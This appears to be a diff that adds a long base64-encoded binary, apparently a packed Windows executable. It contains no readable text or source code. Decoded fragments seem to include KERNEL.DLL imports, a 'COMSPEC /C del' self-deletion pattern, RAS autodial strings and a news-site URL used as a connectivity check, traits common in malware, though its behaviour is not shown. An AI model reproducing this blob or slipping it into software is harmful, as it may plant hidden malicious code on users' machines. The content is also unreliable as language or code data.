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
